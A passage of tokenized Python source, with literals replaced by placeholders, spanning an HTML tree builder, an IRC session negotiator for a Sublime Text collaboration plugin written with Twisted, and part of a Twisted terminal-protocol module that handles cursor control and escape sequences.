__builder . data ( chr ( entity ) ) <EOL> else : <EOL> self . __builder . data ( unichr ( entity ) ) <EOL> else : <EOL> self . unknown_entityref ( name ) <EOL> def handle_data ( self , data ) : <EOL> if isinstance ( data , type ( '<STR_LIT>' ) ) and is_not_ascii ( data ) : <EOL> data = unicode ( data , self . encoding , "<STR_LIT:ignore>" ) <EOL> self . __builder . data ( data ) <EOL> def unknown_entityref ( self , name ) : <EOL> pass <EOL> TreeBuilder = HTMLTreeBuilder <EOL> def parse ( source , encoding = None ) : <EOL> return ElementTree . parse ( source , HTMLTreeBuilder ( encoding = encoding ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import sys <EOL> ElementTree . dump ( parse ( open ( sys . argv [ <NUM_LIT:1> ] ) ) ) </s>
<s> from zope . interface import implements <EOL> from sub_collab . negotiator import base <EOL> from sub_collab . peer import basic <EOL> from sub_collab import common , event , registry , status_bar <EOL> from twisted . words . protocols import irc <EOL> from twisted . internet import reactor , ssl , protocol , error , defer <EOL> import logging , sys , socket , functools <EOL> import sublime <EOL> class IRCNegotiator ( base . BaseNegotiator , common . Observable , protocol . ClientFactory , base . PatchedIRCClient ) : <EOL> """<STR_LIT>""" <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> versionName = '<STR_LIT>' <EOL> versionNum = '<STR_LIT>' <EOL> versionEnv = "<STR_LIT>" <EOL> negotiateCallback = None <EOL> onNegotiateCallback = None <EOL> rejectedOrFailedCallback = None <EOL> def __init__ ( self , id , config ) : <EOL> common . Observable . __init__ ( self ) <EOL> base . BaseNegotiator . __init__ ( self , id , config ) <EOL> base . PatchedIRCClient . __init__ ( self ) <EOL> assert config . has_key ( '<STR_LIT:host>' ) , '<STR_LIT>' <EOL> assert config . has_key ( '<STR_LIT:port>' ) , '<STR_LIT>' <EOL> assert config . has_key ( '<STR_LIT:username>' ) , '<STR_LIT>' <EOL> assert config . has_key ( '<STR_LIT>' ) , '<STR_LIT>' <EOL> self . clientConnection = None <EOL> self . host = self . config [ '<STR_LIT:host>' ] . encode ( ) <EOL> self . port = int ( self . config [ '<STR_LIT:port>' ] ) <EOL> self . nickname = self . config [ '<STR_LIT:username>' ] . encode ( ) <EOL> if self . config . has_key ( '<STR_LIT:password>' ) : <EOL> self . password = self . config [ '<STR_LIT:password>' ] . encode ( ) <EOL> if self . config . has_key ( '<STR_LIT>' ) : <EOL> self . useSSL = self . config [ '<STR_LIT>' ] <EOL> else : <EOL> self . useSSL = False <EOL> self . channel = self . config [ '<STR_LIT>' ] . encode ( ) <EOL> self . peerUsers = [ ] <EOL> self . unverifiedUsers = None <EOL> self . connectionFailed = False <EOL> self . pendingSession = None <EOL> self . 
hostAddressToTryQueue = None <EOL> def connect ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . isConnected ( ) : <EOL> return <EOL> if self . clientConnection : <EOL> self . clientConnection . disconnect ( ) <EOL> status_bar . status_message ( '<STR_LIT>' % self . str ( ) ) <EOL> if self . useSSL : <EOL> self . logger . info ( '<STR_LIT>' % self . str ( ) ) <EOL> self . clientConnection = reactor . connectSSL ( self . host , self . port , self , ssl . ClientContextFactory ( ) ) <EOL> else : <EOL> self . logger . info ( '<STR_LIT>' % self . str ( ) ) <EOL> self . clientConnection = reactor . connectTCP ( self . host , self . port , self ) <EOL> def isConnected ( self ) : <EOL> """<STR_LIT>""" <EOL> connected = None <EOL> if self . clientConnection : <EOL> if self . _registered : <EOL> connected = True <EOL> else : <EOL> connected = False <EOL> return connected <EOL> def disconnect ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . clientConnection : <EOL> if self . clientConnection . state == '<STR_LIT>' : <EOL> self . clientConnection = None <EOL> self . _registered = False <EOL> self . peerUsers = None <EOL> else : <EOL> self . clientConnection . disconnect ( ) <EOL> self . logger . info ( '<STR_LIT>' % self . host ) <EOL> status_bar . status_message ( '<STR_LIT>' % self . str ( ) ) <EOL> self . clientConnection = None <EOL> self . _registered = False <EOL> self . peerUsers = None <EOL> self . unverifiedUsers = None <EOL> def listUsers ( self ) : <EOL> """<STR_LIT>""" <EOL> fullList = [ ] <EOL> if self . peerUsers : <EOL> for peer in self . peerUsers : <EOL> fullList . append ( peer ) <EOL> if self . unverifiedUsers : <EOL> for unverified in self . unverifiedUsers : <EOL> fullList . append ( '<STR_LIT:*>' + unverified ) <EOL> return fullList <EOL> def getUserName ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . nickname <EOL> def negotiateSession ( self , username ) : <EOL> """<STR_LIT>""" <EOL> if ( not username in self . 
peerUsers ) and ( not username in self . unverifiedUsers ) : <EOL> self . addUserToLists ( username ) <EOL> if self . hostAddressToTryQueue == None or len ( self . hostAddressToTryQueue ) == <NUM_LIT:0> : <EOL> self . hostAddressToTryQueue = socket . gethostbyname_ex ( socket . gethostname ( ) ) [ <NUM_LIT:2> ] <EOL> ipaddress = self . hostAddressToTryQueue . pop ( ) <EOL> session = basic . BasicPeer ( username , self ) <EOL> port = session . hostConnect ( ) <EOL> self . logger . debug ( '<STR_LIT>' % ( username , ipaddress , port ) ) <EOL> status_bar . status_message ( '<STR_LIT>' % ( username , ipaddress ) ) <EOL> self . pendingSession = session <EOL> registry . registerSession ( session ) <EOL> self . ctcpMakeQuery ( username , [ ( '<STR_LIT>' , '<STR_LIT>' % ( base . DCC_PROTOCOL_COLLABORATE , ipaddress , port ) ) ] ) <EOL> def acceptSessionRequest ( self , username , host , port ) : <EOL> self . logger . debug ( '<STR_LIT>' % ( username , host , port ) ) <EOL> status_bar . status_message ( '<STR_LIT>' % ( username , host , port ) ) <EOL> self . logger . info ( '<STR_LIT>' % ( username , host , port ) ) <EOL> session = basic . BasicPeer ( username , self ) <EOL> session . clientConnect ( host , port ) <EOL> registry . registerSession ( session ) <EOL> def rejectSessionRequest ( self , username ) : <EOL> self . logger . debug ( '<STR_LIT>' % username ) <EOL> self . msg ( username , base . SESSION_REJECTED ) <EOL> def retrySessionRequest ( self , username ) : <EOL> self . logger . debug ( '<STR_LIT>' % username ) <EOL> self . msg ( username , base . SESSION_RETRY ) <EOL> def buildProtocol ( self , addr ) : <EOL> return self <EOL> def clientConnectionLost ( self , connector , reason ) : <EOL> if error . ConnectionDone == reason . type : <EOL> self . disconnect ( ) <EOL> else : <EOL> self . logger . error ( '<STR_LIT>' % ( reason . type , reason . value ) ) <EOL> status_bar . status_message ( '<STR_LIT>' % self . 
str ( ) ) <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> self . logger . error ( '<STR_LIT>' % ( reason . type , reason . value ) ) <EOL> status_bar . status_message ( '<STR_LIT>' % self . str ( ) ) <EOL> self . connectionFailed = True <EOL> self . disconnect ( ) <EOL> def connectionMade ( self ) : <EOL> self . logger . debug ( '<STR_LIT>' ) <EOL> base . PatchedIRCClient . connectionMade ( self ) <EOL> self . logger . info ( '<STR_LIT>' + self . host ) <EOL> def signedOn ( self ) : <EOL> status_bar . status_message ( '<STR_LIT>' + self . str ( ) ) <EOL> self . logger . info ( '<STR_LIT>' + self . channel ) <EOL> self . join ( self . channel ) <EOL> def joined ( self , channel ) : <EOL> self . logger . info ( '<STR_LIT>' + self . channel ) <EOL> self . names ( self . channel ) <EOL> def channelNames ( self , channel , names ) : <EOL> assert self . channel == channel . lstrip ( irc . CHANNEL_PREFIXES ) <EOL> names . remove ( self . nickname ) <EOL> self . logger . debug ( '<STR_LIT>' % names ) <EOL> self . unverifiedUsers = [ ] <EOL> self . peerUsers = [ ] <EOL> for name in names : <EOL> self . addUserToLists ( name ) <EOL> def userJoined ( self , user , channel ) : <EOL> assert self . channel == channel . lstrip ( irc . CHANNEL_PREFIXES ) <EOL> self . addUserToLists ( user ) <EOL> def userLeft ( self , user , channel ) : <EOL> assert self . channel == channel . lstrip ( irc . CHANNEL_PREFIXES ) <EOL> self . dropUserFromLists ( user ) <EOL> def userQuit ( self , user , quitMessage ) : <EOL> self . dropUserFromLists ( user ) <EOL> def userKicked ( self , kickee , channel , kicker , message ) : <EOL> assert self . channel == channel . lstrip ( irc . CHANNEL_PREFIXES ) <EOL> self . dropUserFromLists ( user ) <EOL> def userRenamed ( self , oldname , newname ) : <EOL> assert self . channel == channel . lstrip ( irc . CHANNEL_PREFIXES ) <EOL> self . dropUserFromLists ( oldname ) <EOL> self . 
addUserToLists ( newname ) <EOL> def privmsg ( self , user , channel , message ) : <EOL> """<STR_LIT>""" <EOL> username = user . lstrip ( self . getNickPrefixes ( ) ) <EOL> if '<STR_LIT:!>' in username : <EOL> username = username . split ( '<STR_LIT:!>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . logger . debug ( '<STR_LIT>' % ( message , username ) ) <EOL> if message == base . SESSION_RETRY : <EOL> registry . removeSession ( self . pendingSession ) <EOL> self . pendingSession . disconnect ( ) ; <EOL> self . pendingSession = None <EOL> self . negotiateSession ( username ) <EOL> elif message == base . SESSION_FAILED : <EOL> self . logger . warn ( '<STR_LIT>' ) <EOL> registry . removeSession ( self . pendingSession ) <EOL> self . pendingSession . disconnect ( ) ; <EOL> self . pendingSession = None <EOL> elif message == base . SESSION_REJECTED : <EOL> self . logger . info ( '<STR_LIT>' % username ) <EOL> registry . removeSession ( self . pendingSession ) <EOL> self . pendingSession . disconnect ( ) ; <EOL> self . pendingSession = None <EOL> def ctcpReply_VERSION ( self , user , channel , data ) : <EOL> username = user . lstrip ( self . getNickPrefixes ( ) ) <EOL> if '<STR_LIT:!>' in username : <EOL> username = username . split ( '<STR_LIT:!>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> if ( data == ( '<STR_LIT>' % ( self . versionName , self . versionNum , self . versionEnv ) ) ) or ( ( self . versionName in data ) and ( self . versionNum in data ) and ( self . versionEnv in data ) ) : <EOL> self . logger . debug ( '<STR_LIT>' % username ) <EOL> self . peerUsers . append ( username ) <EOL> self . unverifiedUsers . remove ( username ) <EOL> else : <EOL> self . unverifiedUsers . remove ( username ) <EOL> def dccDoChat ( self , user , channel , protocol , address , port , data ) : <EOL> """<STR_LIT>""" <EOL> username = user . lstrip ( self . getNickPrefixes ( ) ) <EOL> if '<STR_LIT:!>' in username : <EOL> username = username . 
split ( '<STR_LIT:!>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . logger . debug ( '<STR_LIT>' % ( username , protocol , address , port ) ) <EOL> if protocol == base . DCC_PROTOCOL_COLLABORATE or protocol == base . DCC_PROTOCOL_RETRY : <EOL> self . notify ( event . INCOMING_SESSION_REQUEST , self , ( username , address , port ) ) <EOL> def dropUserFromLists ( self , user ) : <EOL> username = user . lstrip ( self . getNickPrefixes ( ) ) <EOL> if username in self . peerUsers : <EOL> self . peerUsers . remove ( username ) <EOL> if username in self . unverifiedUsers : <EOL> self . unverifiedUsers . remove ( username ) <EOL> def addUserToLists ( self , user ) : <EOL> username = user . lstrip ( self . getNickPrefixes ( ) ) <EOL> self . unverifiedUsers . append ( username ) <EOL> self . ctcpMakeQuery ( user , [ ( '<STR_LIT>' , None ) ] ) <EOL> def getNickPrefixes ( self ) : <EOL> if not self . _nickprefixes : <EOL> self . _nickprefixes = '<STR_LIT>' <EOL> prefixes = self . supported . getFeature ( '<STR_LIT>' , { } ) <EOL> for prefixTuple in prefixes . itervalues ( ) : <EOL> self . _nickprefixes = self . _nickprefixes + prefixTuple [ <NUM_LIT:0> ] <EOL> return self . _nickprefixes <EOL> def str ( self ) : <EOL> return '<STR_LIT>' % ( self . nickname , self . host , self . port ) </s>
<s> """<STR_LIT>""" <EOL> from zope . interface import implements , Interface <EOL> from twisted . internet import protocol , defer , interfaces as iinternet <EOL> class ITerminalProtocol ( Interface ) : <EOL> def makeConnection ( transport ) : <EOL> """<STR_LIT>""" <EOL> def keystrokeReceived ( keyID , modifier ) : <EOL> """<STR_LIT>""" <EOL> def terminalSize ( width , height ) : <EOL> """<STR_LIT>""" <EOL> def unhandledControlSequence ( seq ) : <EOL> """<STR_LIT>""" <EOL> def connectionLost ( reason ) : <EOL> """<STR_LIT>""" <EOL> class TerminalProtocol ( object ) : <EOL> implements ( ITerminalProtocol ) <EOL> def makeConnection ( self , terminal ) : <EOL> self . terminal = terminal <EOL> self . connectionMade ( ) <EOL> def connectionMade ( self ) : <EOL> """<STR_LIT>""" <EOL> def keystrokeReceived ( self , keyID , modifier ) : <EOL> pass <EOL> def terminalSize ( self , width , height ) : <EOL> pass <EOL> def unhandledControlSequence ( self , seq ) : <EOL> pass <EOL> def connectionLost ( self , reason ) : <EOL> pass <EOL> class ITerminalTransport ( iinternet . 
ITransport ) : <EOL> def cursorUp ( n = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> def cursorDown ( n = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> def cursorForward ( n = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> def cursorBackward ( n = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> def cursorPosition ( column , line ) : <EOL> """<STR_LIT>""" <EOL> def cursorHome ( ) : <EOL> """<STR_LIT>""" <EOL> def index ( ) : <EOL> """<STR_LIT>""" <EOL> def reverseIndex ( ) : <EOL> """<STR_LIT>""" <EOL> def nextLine ( ) : <EOL> """<STR_LIT>""" <EOL> def saveCursor ( ) : <EOL> """<STR_LIT>""" <EOL> def restoreCursor ( ) : <EOL> """<STR_LIT>""" <EOL> def setModes ( modes ) : <EOL> """<STR_LIT>""" <EOL> def resetModes ( mode ) : <EOL> """<STR_LIT>""" <EOL> def setPrivateModes ( modes ) : <EOL> """<STR_LIT>""" <EOL> def resetPrivateModes ( modes ) : <EOL> """<STR_LIT>""" <EOL> def applicationKeypadMode ( ) : <EOL> """<STR_LIT>""" <EOL> def numericKeypadMode ( ) : <EOL> """<STR_LIT>""" <EOL> def selectCharacterSet ( charSet , which ) : <EOL> """<STR_LIT>""" <EOL> def shiftIn ( ) : <EOL> """<STR_LIT>""" <EOL> def shiftOut ( ) : <EOL> """<STR_LIT>""" <EOL> def singleShift2 ( ) : <EOL> """<STR_LIT>""" <EOL> def singleShift3 ( ) : <EOL> """<STR_LIT>""" <EOL> def selectGraphicRendition ( * attributes ) : <EOL> """<STR_LIT>""" <EOL> def horizontalTabulationSet ( ) : <EOL> """<STR_LIT>""" <EOL> def tabulationClear ( ) : <EOL> """<STR_LIT>""" <EOL> def tabulationClearAll ( ) : <EOL> """<STR_LIT>""" <EOL> def doubleHeightLine ( top = True ) : <EOL> """<STR_LIT>""" <EOL> def singleWidthLine ( ) : <EOL> """<STR_LIT>""" <EOL> def doubleWidthLine ( ) : <EOL> """<STR_LIT>""" <EOL> def eraseToLineEnd ( ) : <EOL> """<STR_LIT>""" <EOL> def eraseToLineBeginning ( ) : <EOL> """<STR_LIT>""" <EOL> def eraseLine ( ) : <EOL> """<STR_LIT>""" <EOL> def eraseToDisplayEnd ( ) : <EOL> """<STR_LIT>""" <EOL> def eraseToDisplayBeginning ( ) : <EOL> """<STR_LIT>""" <EOL> def eraseDisplay ( ) : <EOL> 
"""<STR_LIT>""" <EOL> def deleteCharacter ( n = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> def insertLine ( n = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> def deleteLine ( n = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> def reportCursorPosition ( ) : <EOL> """<STR_LIT>""" <EOL> def reset ( ) : <EOL> """<STR_LIT>""" <EOL> def unhandledControlSequence ( seq ) : <EOL> """<STR_LIT>""" <EOL> CSI = '<STR_LIT>' <EOL> CST = { '<STR_LIT>' : '<STR_LIT>' } <EOL> class modes : <EOL> """<STR_LIT>""" <EOL> KEYBOARD_ACTION = KAM = <NUM_LIT:2> <EOL> INSERTION_REPLACEMENT = IRM = <NUM_LIT:4> <EOL> LINEFEED_NEWLINE = LNM = <NUM_LIT:20> <EOL> class privateModes : <EOL> """<STR_LIT>""" <EOL> ERROR = <NUM_LIT:0> <EOL> CURSOR_KEY = <NUM_LIT:1> <EOL> ANSI_VT52 = <NUM_LIT:2> <EOL> COLUMN = <NUM_LIT:3> <EOL> SCROLL = <NUM_LIT:4> <EOL> SCREEN = <NUM_LIT:5> <EOL> ORIGIN = <NUM_LIT:6> <EOL> AUTO_WRAP = <NUM_LIT:7> <EOL> AUTO_REPEAT = <NUM_LIT:8> <EOL> PRINTER_FORM_FEED = <NUM_LIT> <EOL> PRINTER_EXTENT = <NUM_LIT> <EOL> CURSOR_MODE = <NUM_LIT> <EOL> CS_US = '<STR_LIT>' <EOL> CS_UK = '<STR_LIT>' <EOL> CS_DRAWING = '<STR_LIT>' <EOL> CS_ALTERNATE = '<STR_LIT>' <EOL> CS_ALTERNATE_SPECIAL = '<STR_LIT>' <EOL> G0 = '<STR_LIT>' <EOL> G1 = '<STR_LIT>' <EOL> G2 = '<STR_LIT>' <EOL> G3 = '<STR_LIT>' <EOL> NORMAL = <NUM_LIT:0> <EOL> BOLD = <NUM_LIT:1> <EOL> UNDERLINE = <NUM_LIT:4> <EOL> BLINK = <NUM_LIT:5> <EOL> REVERSE_VIDEO = <NUM_LIT:7> <EOL> class Vector : <EOL> def __init__ ( self , x , y ) : <EOL> self . x = x <EOL> self . y = y <EOL> def log ( s ) : <EOL> file ( '<STR_LIT>' , '<STR_LIT:a>' ) . 
write ( str ( s ) + '<STR_LIT:\n>' ) <EOL> _KEY_NAMES = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class _const ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT:[>' + self . name + '<STR_LIT:]>' <EOL> FUNCTION_KEYS = [ <EOL> _const ( _name ) for _name in _KEY_NAMES ] <EOL> class ServerProtocol ( protocol . Protocol ) : <EOL> implements ( ITerminalTransport ) <EOL> protocolFactory = None <EOL> terminalProtocol = None <EOL> TAB = '<STR_LIT:\t>' <EOL> BACKSPACE = '<STR_LIT>' <EOL> lastWrite = '<STR_LIT>' <EOL> state = '<STR_LIT:data>' <EOL> termSize = Vector ( <NUM_LIT> , <NUM_LIT> ) <EOL> cursorPos = Vector ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> scrollRegion = None <EOL> factory = None <EOL> def __init__ ( self , protocolFactory = None , * a , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if protocolFactory is not None : <EOL> self . protocolFactory = protocolFactory <EOL> self . protocolArgs = a <EOL> self . protocolKwArgs = kw <EOL> self . _cursorReports = [ ] <EOL> def connectionMade ( self ) : <EOL> if self . protocolFactory is not None : <EOL> self . terminalProtocol = self . protocolFactory ( * self . protocolArgs , ** self . protocolKwArgs ) <EOL> try : <EOL> factory = self . factory <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> self . terminalProtocol . factory = factory <EOL> self . terminalProtocol . makeConnection ( self ) <EOL> def dataReceived ( self , data ) : <EOL> for ch in data : <EOL> if self . state == '<STR_LIT:data>' : <EOL> if ch == '<STR_LIT>' : <EOL> self . 
state = '<STR_LIT>' <EOL> else : <EOL> self . terminalProtocol . keystrokeReceived ( ch , None ) <EOL> elif self . state == '<STR_LIT>' : <EOL> if ch == '<STR_LIT:[>' : <EOL> self . state = '<STR_LIT>' <EOL> self . escBuf = [ ] <EOL> elif ch == '<STR_LIT:O>' : <EOL> self . state = '<STR_LIT>' <EOL> else : <EOL> self . state = '<STR_LIT:data>' <EOL> self . _handleShortControlSequence ( ch ) <EOL> elif self . state == '<STR_LIT>' : <EOL> if ch == '<STR_LIT:O>' : <EOL> self . state = '<STR_LIT>' <EOL> elif ch . isalpha ( ) or ch == '<STR_LIT>' : <EOL> self . _handleControlSequence ( '<STR_LIT>' . join ( self . escBuf ) + ch ) <EOL> del self . escBuf <EOL> self . state = '<STR_LIT:data>' <EOL> else : <EOL> self . escBuf . append ( ch ) <EOL> elif self . state == '<STR_LIT>' : <EOL> self . _handleLowFunctionControlSequence ( ch ) <EOL> self . state = '<STR_LIT:data>' <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def _handleShortControlSequence ( self , ch ) : <EOL> self . terminalProtocol . keystrokeReceived ( ch , self . ALT ) <EOL> def _handleControlSequence ( self , buf ) : <EOL> buf = '<STR_LIT>' + buf <EOL> f = getattr ( self . controlSequenceParser , CST . get ( buf [ - <NUM_LIT:1> ] , buf [ - <NUM_LIT:1> ] ) , None ) <EOL> if f is None : <EOL> self . unhandledControlSequence ( buf ) <EOL> else : <EOL> f ( self , self . terminalProtocol , buf [ : - <NUM_LIT:1> ] ) <EOL> def unhandledControlSequence ( self , buf ) : <EOL> self . terminalProtocol . unhandledControlSequence ( buf ) <EOL> def _handleLowFunctionControlSequence ( self , ch ) : <EOL> map = { '<STR_LIT:P>' : self . F1 , '<STR_LIT>' : self . F2 , '<STR_LIT:R>' : self . F3 , '<STR_LIT:S>' : self . F4 } <EOL> keyID = map . get ( ch ) <EOL> if keyID is not None : <EOL> self . terminalProtocol . keystrokeReceived ( keyID , None ) <EOL> else : <EOL> self . terminalProtocol . 
unhandledControlSequence ( '<STR_LIT>' + ch ) <EOL> class ControlSequenceParser : <EOL> def A ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . UP_ARROW , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:A>' ) <EOL> def B ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . DOWN_ARROW , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:B>' ) <EOL> def C ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . RIGHT_ARROW , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:C>' ) <EOL> def D ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . LEFT_ARROW , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:D>' ) <EOL> def E ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . NUMPAD_MIDDLE , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:E>' ) <EOL> def F ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . END , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:F>' ) <EOL> def H ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . HOME , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:H>' ) <EOL> def R ( self , proto , handler , buf ) : <EOL> if not proto . _cursorReports : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:R>' ) <EOL> elif buf . startswith ( '<STR_LIT>' ) : <EOL> report = buf [ <NUM_LIT:2> : ] <EOL> parts = report . split ( '<STR_LIT:;>' ) <EOL> if len ( parts ) != <NUM_LIT:2> : <EOL> handler . 
unhandledControlSequence ( buf + '<STR_LIT:R>' ) <EOL> else : <EOL> Pl , Pc = parts <EOL> try : <EOL> Pl , Pc = int ( Pl ) , int ( Pc ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:R>' ) <EOL> else : <EOL> d = proto . _cursorReports . pop ( <NUM_LIT:0> ) <EOL> d . callback ( ( Pc - <NUM_LIT:1> , Pl - <NUM_LIT:1> ) ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT:R>' ) <EOL> def Z ( self , proto , handler , buf ) : <EOL> if buf == '<STR_LIT>' : <EOL> handler . keystrokeReceived ( proto . TAB , proto . SHIFT ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT>' ) <EOL> def tilde ( self , proto , handler , buf ) : <EOL> map = { <NUM_LIT:1> : proto . HOME , <NUM_LIT:2> : proto . INSERT , <NUM_LIT:3> : proto . DELETE , <EOL> <NUM_LIT:4> : proto . END , <NUM_LIT:5> : proto . PGUP , <NUM_LIT:6> : proto . PGDN , <EOL> <NUM_LIT:15> : proto . F5 , <NUM_LIT> : proto . F6 , <NUM_LIT> : proto . F7 , <EOL> <NUM_LIT> : proto . F8 , <NUM_LIT:20> : proto . F9 , <NUM_LIT> : proto . F10 , <EOL> <NUM_LIT> : proto . F11 , <NUM_LIT> : proto . F12 } <EOL> if buf . startswith ( '<STR_LIT>' ) : <EOL> ch = buf [ <NUM_LIT:2> : ] <EOL> try : <EOL> v = int ( ch ) <EOL> except ValueError : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT>' ) <EOL> else : <EOL> symbolic = map . get ( v ) <EOL> if symbolic is not None : <EOL> handler . keystrokeReceived ( map [ v ] , None ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT>' ) <EOL> else : <EOL> handler . unhandledControlSequence ( buf + '<STR_LIT>' ) <EOL> controlSequenceParser = ControlSequenceParser ( ) <EOL> def cursorUp ( self , n = <NUM_LIT:1> ) : <EOL> assert n >= <NUM_LIT:1> <EOL> self . cursorPos . y = max ( self . cursorPos . y - n , <NUM_LIT:0> ) <EOL> self . write ( '<STR_LIT>' % ( n , ) ) <EOL> def cursorDown ( self , n = <NUM_LIT:1> ) : <EOL> assert n >= <NUM_LIT:1> <EOL> self . cursorPos . y = min ( self . 
cursorPos . y + n , self . termSize . y - <NUM_LIT:1> ) <EOL> self . write ( '<STR_LIT>' % ( n , ) ) <EOL> def cursorForward ( self , n = <NUM_LIT:1> ) : <EOL> assert n >= <NUM_LIT:1> <EOL> self . cursorPos . x = min ( self . cursorPos . x + n , self . termSize . x - <NUM_LIT:1> ) <EOL> self . write ( '<STR_LIT>' % ( n , ) ) <EOL> def cursorBackward ( self , n = <NUM_LIT:1> ) : <EOL> assert n >= <NUM_LIT:1> <EOL> self . cursorPos . x = max ( self . cursorPos . x - n , <NUM_LIT:0> ) <EOL> self . write ( '<STR_LIT>' % ( n , ) ) <EOL> def cursorPosition ( self , column , line ) : <EOL> self . write ( '<STR_LIT>' % ( line + <NUM_LIT:1> , column + <NUM_LIT:1> ) ) <EOL> def cursorHome ( self ) : <EOL> self . cursorPos . x = self . cursorPos . y = <NUM_LIT:0> <EOL> self . write ( '<STR_LIT>' ) <EOL> def index ( self ) : <EOL> self . cursorPos . y = min ( self . cursorPos . y + <NUM_LIT:1> , self . termSize . y - <NUM_LIT:1> ) <EOL> self . write ( '<STR_LIT>' ) <EOL> def reverseIndex ( self ) : <EOL> self . cursorPos . y = max ( self . cursorPos . y - <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> self . write ( '<STR_LIT>' ) <EOL> def nextLine ( self ) : <EOL> self . cursorPos . x = <NUM_LIT:0> <EOL> self . cursorPos . y = min ( self . cursorPos . y + <NUM_LIT:1> , self . termSize . y - <NUM_LIT:1> ) <EOL> self . write ( '<STR_LIT:\n>' ) <EOL> def saveCursor ( self ) : <EOL> self . _savedCursorPos = Vector ( self . cursorPos . x , self . cursorPos . y ) <EOL> self . write ( '<STR_LIT>' ) <EOL> def restoreCursor ( self ) : <EOL> self . cursorPos = self . _savedCursorPos <EOL> del self . _savedCursorPos <EOL> self . write ( '<STR_LIT>' ) <EOL> def setModes ( self , modes ) : <EOL> self . write ( '<STR_LIT>' % ( '<STR_LIT:;>' . join ( map ( str , modes ) ) , ) ) <EOL> def setPrivateModes ( self , modes ) : <EOL> self . write ( '<STR_LIT>' % ( '<STR_LIT:;>' . join ( map ( str , modes ) ) , ) ) <EOL> def resetModes ( self , modes ) : <EOL> self . write ( '<STR_LIT>' % ( '<STR_LIT:;>' . 
join ( map ( str , modes ) ) , ) ) <EOL> def resetPrivateModes ( self , modes ) : <EOL> self . write ( '<STR_LIT>' % ( '<STR_LIT:;>' . join ( map ( str , modes ) ) , ) ) <EOL> def applicationKeypadMode ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def numericKeypadMode ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def selectCharacterSet ( self , charSet , which ) : <EOL> if which == G0 : <EOL> which = '<STR_LIT:(>' <EOL> elif which == G1 : <EOL> which = '<STR_LIT:)>' <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if charSet == CS_UK : <EOL> charSet = '<STR_LIT:A>' <EOL> elif charSet == CS_US : <EOL> charSet = '<STR_LIT:B>' <EOL> elif charSet == CS_DRAWING : <EOL> charSet = '<STR_LIT:0>' <EOL> elif charSet == CS_ALTERNATE : <EOL> charSet = '<STR_LIT:1>' <EOL> elif charSet == CS_ALTERNATE_SPECIAL : <EOL> charSet = '<STR_LIT:2>' <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . write ( '<STR_LIT>' + which + charSet ) <EOL> def shiftIn ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def shiftOut ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> def singleShift2 ( self ) : <EOL> self . 